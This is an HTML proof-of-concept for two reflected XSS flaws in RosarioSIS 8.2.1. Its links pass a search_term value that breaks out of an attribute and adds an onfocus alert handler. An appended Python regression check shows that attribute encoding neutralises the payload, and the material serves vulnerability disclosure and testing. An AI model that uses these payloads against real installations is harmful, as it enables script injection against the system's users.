RosarioSIS_PoC.htm
<!DOCTYPE html>
<html>
<head>
<title>PoC - RosarioSIS 8.2.1 Reflected XSS</title>
<style>li{margin-bottom: 22px;}</style>
</head>
<body>
<h1>Cross Site Scripting (XSS) in RosarioSIS 8.2.1</h1>
<ol>
<li>
XSS in Modules.php?modname=misc/ChooseCourse.php&modfunc=choose_course&course_modfunc=search via the search_term parameter<br>
<a href="#" onclick='window.open("http://localhost/rosariosis/Modules.php?modname=misc/ChooseCourse.php&modfunc=choose_course&course_modfunc=search&last_year=&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29"); return false;'>Open in Browser</a>
</li>
<li>
XSS in Modules.php?modname=misc/ChooseRequest.php&modfunc=choose_course&course_modfunc=search via the search_term parameter<br>
<a href="#" onclick='window.open("http://localhost/rosariosis/Modules.php?modname=misc/ChooseRequest.php&modfunc=choose_course&course_modfunc=search&last_year=&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29"); return false;'>Open in Browser</a>
</li>
</ol>
</body>
</html>
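
Added example (not part of the PoC file or of RosarioSIS): a regression check that decodes the `search_term` value from the link above, renders it into a hypothetical double-quoted `value` attribute, and compares the parsed attributes with and without attribute-context encoding. The `<input>` template and all function names are assumptions for illustration; in PHP the matching encoder is `htmlspecialchars()` with `ENT_QUOTES`.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# URL copied from the first PoC link on this page.
POC_URL = ("http://localhost/rosariosis/Modules.php?modname=misc/ChooseCourse.php"
           "&modfunc=choose_course&course_modfunc=search&last_year="
           "&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29")


def search_term(url):
    """Return the URL-decoded search_term value, as the server receives it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query["search_term"][0]


# ASSUMPTION: hypothetical template that reflects the value into a
# double-quoted attribute. This is not RosarioSIS source code.
def render_unsafe(term):
    return '<input type="text" name="search_term" value="' + term + '">'


def render_encoded(term):
    # Encode for the attribute context: & < > " ' are emitted as entities,
    # so the value can no longer close the surrounding quotes.
    return ('<input type="text" name="search_term" value="'
            + escape(term, quote=True) + '">')


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attrs(markup):
    """Tokenize markup with html.parser and return the input tag's attributes."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_handlers(markup):
    """Names of on* event-handler attributes present after parsing."""
    return sorted(name for name in parsed_attrs(markup) if name.startswith("on"))
```

With the unencoded template the parser reports an extra `onfocus` attribute; with encoding the whole string stays inside `value`.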